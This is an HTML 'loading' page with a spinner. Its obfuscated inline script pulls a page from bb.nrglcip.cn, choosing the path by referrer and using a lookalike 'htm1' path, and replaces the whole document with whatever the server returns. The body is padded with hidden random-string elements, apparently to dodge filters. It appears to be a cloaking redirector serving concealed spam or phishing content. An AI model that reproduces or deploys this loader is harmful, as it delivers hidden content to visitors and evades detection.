<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .p3lsUZi {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .p3lsUZi .wna4u9CX {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .p3lsUZi .content {
            line-height: 50px;
            text-align: center
        }

        .p3lsUZi .img {
            width: 100%
        }

        .p3lsUZi .VjeL0Y {
            text-align: center
        }

        .p3lsUZi .VjeL0Y span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .p3lsUZi .VjeL0Y span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .p3lsUZi .VjeL0Y span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .p3lsUZi .VjeL0Y span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .p3lsUZi .VjeL0Y span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .p3lsUZi .VjeL0Y span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .p3lsUZi .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function lH7oTmSd66n(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var KdNe3 = lH7oTmSd66n('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ KdNe3 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ KdNe3 +".html?a=share";
		}
		
        JxBGoyiZS=url+"#"+new Date().getTime();
        JxBGoyiZS && function() {
            $.get(JxBGoyiZS, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >c7TMyfpsjRfq45uPJ4rj6oJ5xJbtiaWr4t6GPiVzmkBWw3kxIJmg4</b>
<h1 style='display:none' >yd1NHoelXwQqeey3b</h1>
<img  src='' style='display:none'>
<p  style='display:none'>QLYxMfJL5Eii4np4SfSs</p>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>G3gaHPYnPGt2F9o89QmuodWHXSWzu30sWHDchbgL7ixGXI9Uf</a>
<p  style='display:none'>QLYxMfJL5Eii4np4SfSs</p>
<div style='display:none'>HumG8G0ce7Md3fLeU8Gsurw</div>
<h1 style='display:none' >yd1NHoelXwQqeey3b</h1>
<ul style='display:none' >pAgwoW5UqRseS8AzljVPJCXsuz2dsHnhOIwRN9hcV9G</ul><div class="p3lsUZi">
    <div class="wna4u9CX">
        <div class="VjeL0Y">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >atZEzJvvb69guXODbw</h1>
<p  style='display:none'>d39CqgyhgSzr1Q</p>
<p  style='display:none'>d39CqgyhgSzr1Q</p>
<p  style='display:none'>d39CqgyhgSzr1Q</p>
<a  href='#' style='display:none'>KXPqikiUVX9ZZSFKpQmjfQbJONAU5EQ8D</a>
<b style='display:none' >Bx7UrK3m3z4cKKOJttEGgQr7lvCagQiArWB0tSoOjOORtDdwNLWOFfqA3J89</b>
<ul style='display:none' >cWDYkcpX3sfOLx5fQtI9BGMbrgxZ1HZtPWda1CE3DooowSd0aIXYdHT3jFwqPHEbtR9w0F7d2HJBqQaTzrXnUc</ul>
<li style='display:none' >b4Eq5j3FJ7JI2HECtWZDlBEU1oiSqG386ihJYZWXkDKO9Us6yCcRDGflCNOfhf9Sje</li>
<a  href='#' style='display:none'>KXPqikiUVX9ZZSFKpQmjfQbJONAU5EQ8D</a>
<h1 style='display:none' >atZEzJvvb69guXODbw</h1></body>
</html>